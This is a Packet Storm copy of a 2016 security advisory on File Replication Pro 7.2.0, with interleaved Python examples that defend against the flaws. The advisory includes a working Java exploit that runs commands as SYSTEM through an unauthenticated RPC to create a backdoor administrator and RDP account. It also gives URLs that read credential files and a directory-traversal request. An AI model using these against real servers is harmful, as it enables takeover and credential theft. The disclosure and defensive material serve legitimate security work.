File Replication Pro 7.2.0 Command Execution / File Disclosure / Traversal

2016-02-11T00:00:00
ID PACKETSTORM:135715
Type packetstorm
Reporter Jerold Hoong
Modified 2016-02-11T00:00:00

Description

                                        
                                            `Vantage Point Security Advisory 2016-001  
================================  
  
Title: File Replication Pro Remote Command Execution  
Vendor: File Replication Pro  
Vendor URL: http://www.filereplicationpro.com/  
Versions affected: =< 7.2.0  
Severity: High  
Vendor notified: Yes  
Reported: 29 October 2015  
Public release: 10 February 2016  
Author: Jerold Hoong and the VP team <jerold[at]vantagepoint[dot]sg>  
Permalink:  
  
Summary:  
--------  
File Replication Pro (FRP) is a file management solution that is used
to back up and copy files from various nodes in the network. Vantage
Point has discovered multiple vulnerabilities in FRP v7.2.0 (and
possibly prior versions) that allow a remote, unauthenticated malicious
user to run arbitrary code with SYSTEM privileges.
  
The vulnerabilities that were discovered are:  
  
- Unauthenticated Remote Command Execution  
- Unauthenticated Remote Arbitrary File Disclosure  
- Unauthenticated Directory Traversal and File Listing  
  
1. Unauthenticated Remote Command Execution  
-------------------------------------------  
The backup agent implements an RPC service on port 9200 that supports
various calls, including a function called "ExecCommand" that,
unsurprisingly, executes shell commands on the system. A password hash
is used to authenticate calls on this interface (note that the hash
itself, and not the password, is used for authentication). This hash can
be obtained via the remote file disclosure vulnerability present in
the software (listed below) and used to authenticate to the RPC
service, after which arbitrary commands are executed as the
SYSTEM user.
  
POC Exploit Code of Malicious RPC Client:  
  
/**
 * @author Jerold Hoong (Vantage Point Security)
 * File Replication Pro =< v7.2.0
 * Remote Command Execution PoC Working Exploit
 * www.vantagepoint.sg
 * NOTE: Include FRP libraries to compile
 */

import java.io.IOException;
import java.util.HashMap;
import java.util.Map;
import net.diasoft.frp.engine.exception.RPCException;
import net.diasoft.frp.engine.model.AddressPort;
import net.diasoft.frp.engine.tcp.client.RPCDriver;
import net.diasoft.frp.engine.tcp.client.TCPConnection;

public class Main {

    static String ip = "1.2.3.4";
    static int port = 9200;
    // password string can be retrieved from remote file disclosure
    // vulnerability (configuration.xml)
    // If no password is set, input blank string for password
    // Use IE to navigate to <Target IP>:9200. OK = NO-AUTH, Error = AUTH

    static String password = ""; // password 12345 jLIjfQZ5yojbZGTqxg2pY0VROWQ=

    public static void main(String[] args) {

        AddressPort ap = new AddressPort(ip, port);
        AddressPort addresses[] = {ap};
        TCPConnection _tcp_connection = null;

        try {
            _tcp_connection = new TCPConnection(addresses, password, true);
        } catch (Exception e) {
            e.printStackTrace();
        }

        System.out.print("Connecting to host...");
        RPCDriver rpc = new RPCDriver(_tcp_connection);
        HashMap p = new HashMap();

        try {
            Map r = rpc.callFunction("ExecCommand", p);
            System.out.print("Success!\n");
        } catch (RPCException e) {
            e.printStackTrace();
        } catch (IOException e) {
            e.printStackTrace();
        } catch (ClassNotFoundException e) {
            e.printStackTrace();
        }

        // add new user
        System.out.print("Attempting to add user 'vantagepoint' with "
                + "password 'LOLrofl1337!': ");
        p.put("COMMAND", "net user vantagepoint LOLrofl1337! /add");
        try {
            Map r = rpc.callFunction("ExecCommand", p);
        } catch (RPCException e) {
            e.printStackTrace();
        } catch (IOException e) {
            e.printStackTrace();
        } catch (ClassNotFoundException e) {
            e.printStackTrace();
        }

        // add new user to Admin group
        System.out.print("Attempting to add user 'vantagepoint' to "
                + "'Administrators' group: ");
        p.put("COMMAND", "net localgroup \"Administrators\" vantagepoint /add");
        try {
            Map r = rpc.callFunction("ExecCommand", p);
        } catch (RPCException e) {
            e.printStackTrace();
        } catch (IOException e) {
            e.printStackTrace();
        } catch (ClassNotFoundException e) {
            e.printStackTrace();
        }

        // add new user to RDP group
        System.out.print("Attempting to add user 'vantagepoint' to "
                + "'Remote Desktop Users' group:");
        p.put("COMMAND", "net localgroup \"Remote Desktop Users\" "
                + "vantagepoint /add");
        try {
            Map r = rpc.callFunction("ExecCommand", p);
        } catch (RPCException e) {
            e.printStackTrace();
        } catch (IOException e) {
            e.printStackTrace();
        } catch (ClassNotFoundException e) {
            e.printStackTrace();
        }
        System.out.print("\n\n---- END ----\n\n");

    }
}
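
The design point in section 1, that the stored hash rather than the password is what authenticates a caller, can be shown in a few lines. The following Python is an added example, not the advisory's PoC and not FRP's code; the derivation scheme (PBKDF2-HMAC-SHA256), the salt and the stored-record layout are assumptions, since the page does not describe how FRP hashes its password. It places a check that compares the submitted token against the stored hash beside one that re-derives the hash from a submitted password, and shows that only the first accepts the stored hash on its own.

```python
import hashlib
import hmac

# Constructed example record for one RPC user. FRP keeps its hash in
# configuration.xml (per the advisory); the scheme below is assumed.
SALT = b"constructed-salt-0001"
PASSWORD = b"12345"  # the sample password the advisory mentions


def derive(password: bytes, salt: bytes = SALT) -> bytes:
    """Derive the stored verifier from a password (assumed PBKDF2 scheme)."""
    return hashlib.pbkdf2_hmac("sha256", password, salt, 100_000)


STORED_HASH = derive(PASSWORD)


def vulnerable_check(submitted: bytes) -> bool:
    """The flawed design from section 1: the client submits the hash and the
    server compares it to the stored hash. Anyone who can read the stored
    hash (here, via the file disclosure bug) is accepted without ever
    knowing the password, so the hash is the credential."""
    return hmac.compare_digest(submitted, STORED_HASH)


def hardened_check(submitted_password: bytes) -> bool:
    """The fixed design: the client submits the password and the server
    re-derives the verifier. The stored hash by itself is not accepted."""
    return hmac.compare_digest(derive(submitted_password), STORED_HASH)


def demo() -> dict:
    """Compare both checks against the same disclosed record."""
    disclosed = STORED_HASH  # what a configuration.xml read would yield
    return {
        "vulnerable_accepts_stored_hash": vulnerable_check(disclosed),
        "hardened_accepts_stored_hash": hardened_check(disclosed),
        "hardened_accepts_real_password": hardened_check(PASSWORD),
    }


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name}: {outcome}")
```

The hardened form only helps if the password travels over an authenticated, encrypted channel (for example TLS with the agent's certificate pinned); sending it in the clear would just move the secret from the configuration file onto the wire. Restricting who can reach port 9200 at all is the complementary control.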
  
  
2. Unauthenticated Remote Arbitrary File Disclosure  
---------------------------------------------------  
A flaw in File Replication Pro allows a malicious user to gain access
to the contents of any file on the remote server. This leads to the
compromise of sensitive information such as user accounts and password
hashes, which can then be used to further exploit the server using
other vulnerabilities in the software. For example, accessing the
following URLs discloses File Replication Pro's web interface user
accounts and credentials:
  
- http://1.2.3.4:9100/DetailedLogReader.jsp?log_path=C:\Program+Files\FileReplicationPro\\etc\\properties.xml  
- http://1.2.3.4:9100/DetailedLogReader.jsp?log_path=C:\Program+Files\FileReplicationPro\\etc\\configuration.xml  
  
  
3. Unauthenticated Directory Traversal and File Listing  
-------------------------------------------------------  
It was possible to anonymously view the file directory structure of  
the remote File Replication Pro management server as well as the file  
directory structure of all server nodes that are managed by the  
management server. The parameters that are used to construct the POST  
request in the example code below can be obtained via the remote file  
disclosure vulnerability by accessing File Replication Pro's  
configuration.xml, properties.xml and .frp_id files.  
  
POST /GetRemoteDirList.jsp?server_name=WIN7SP1&server_key=WIN7SP1~29d919a3:150c736b708:-8000&server_role=Source&server_password=&parent_dir=../../../c:/ HTTP/1.1
Host: 127.0.0.1:9100  
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:41.0) Gecko/20100101 Firefox/41.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://127.0.0.1:9100/AddEditJob.do?action=new  
Cookie: show_greeting=value; JSESSIONID=81cgjqf795cai  
Connection: keep-alive  
Pragma: no-cache  
Cache-Control: no-cache  
Content-Length: 0  
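
The two web-side flaws (sections 2 and 3) share one root cause: a caller-supplied path, `log_path` or `parent_dir`, is used without being confined to the directory the endpoint is meant to serve. The following Python is an added example, not FRP's code and not part of the advisory; it shows the confinement check such an endpoint needs, and then runs that same check over a few constructed access-log lines to flag the request shapes the advisory documents. `LOG_BASE`, `JOB_ROOT`, the per-endpoint parameter table, the log format and the sample lines are all assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Assumed directories each endpoint is meant to serve (the page does not
# state where FRP keeps log files or replication job roots).
LOG_BASE = "C:/Program Files/FileReplicationPro/log"
JOB_ROOT = "D:/replication"

# Endpoint -> (parameter that carries the path, directory it must stay in).
WATCHED = {
    "/DetailedLogReader.jsp": ("log_path", LOG_BASE),
    "/GetRemoteDirList.jsp": ("parent_dir", JOB_ROOT),
}


def _segments(path: str) -> list:
    """Split on both Windows and POSIX separators; drop empty and '.' parts."""
    return [s for s in re.split(r"[\\/]+", path) if s not in ("", ".")]


def is_absolute(path: str) -> bool:
    """Drive-letter (C:...), UNC (\\\\host) and leading-separator paths are absolute."""
    return bool(re.match(r"^(?:[A-Za-z]:|[\\/])", path))


def resolve_within(base: str, requested: str):
    """Join `requested` onto `base` logically and return the normalised path,
    or None if the request is absolute or climbs above `base`.
    This is a pure string check; a real handler must additionally realpath()
    the result on the filesystem so symlinks cannot step outside `base`."""
    if is_absolute(requested):
        return None
    stack = _segments(base)
    depth = len(stack)
    for seg in _segments(requested):
        if seg == "..":
            if len(stack) <= depth:
                return None  # would climb above the base directory
            stack.pop()
        else:
            stack.append(seg)
    return "/".join(stack)


# Common-log-format request line, enough for the fields used below (assumed).
LOG_LINE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def classify_request(line: str):
    """Return (source_ip, reason) when a watched endpoint was called with a
    path that escapes its directory, else None."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if parts.path not in WATCHED:
        return None
    param, base = WATCHED[parts.path]
    # parse_qs decodes %xx and '+', so C:\Program+Files becomes C:\Program Files
    for value in parse_qs(parts.query, keep_blank_values=True).get(param, []):
        if resolve_within(base, value) is None:
            return (m.group("src"), f"{parts.path} {param}={value!r} escapes {base}")
    return None


def scan(lines) -> list:
    """Run classify_request over a log and collect the hits."""
    return [hit for hit in map(classify_request, lines) if hit is not None]


# Constructed sample log: one benign and one suspicious request per endpoint.
SAMPLE_LOG = [
    r'10.0.0.5 - - [10/Feb/2016:10:00:01 +0800] "GET /DetailedLogReader.jsp?log_path=job1.log HTTP/1.1" 200 512',
    r'10.0.0.9 - - [10/Feb/2016:10:00:07 +0800] "GET /DetailedLogReader.jsp?log_path=C:\Program+Files\FileReplicationPro\etc\configuration.xml HTTP/1.1" 200 4096',
    r'10.0.0.9 - - [10/Feb/2016:10:00:12 +0800] "POST /GetRemoteDirList.jsp?server_name=WIN7SP1&server_role=Source&server_password=&parent_dir=../../../c:/ HTTP/1.1" 200 2048',
    r'10.0.0.5 - - [10/Feb/2016:10:00:20 +0800] "POST /GetRemoteDirList.jsp?server_name=WIN7SP1&parent_dir=jobs/share HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for src, reason in scan(SAMPLE_LOG):
        print(f"{src}: {reason}")
```

The same `resolve_within` check serves both roles: in the fixed handler it decides whether to open the file at all, and in the detection script it decides whether a logged request should have been refused. Because the advisory's requests were answered with a 200, the status code alone tells a reviewer nothing; the path parameter has to be examined.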
  
  
Fix Information:  
----------------  
Upgrade to the latest version of File Replication Pro (7.3.0).
  
Timeline:  
---------  
28 October 2015 - Vulnerabilities discovered  
06 November 2015 - Vendor acknowledged and scheduled fixes to commence  
02 February 2016 - Patch released by vendor  
10 February 2016 - Release of this advisory to the public  
  
About Vantage Point Security:  
-----------------------------  
  
Vantage Point is the leading provider for penetration testing and  
security advisory services in Singapore. Clients in the Financial,  
Banking and Telecommunications industries select Vantage Point  
Security based on technical competency and a proven track record to  
deliver significant and measurable improvements in their security  
posture.  
  
https://www.vantagepoint.sg/  
office[at]vantagepoint[dot]sg  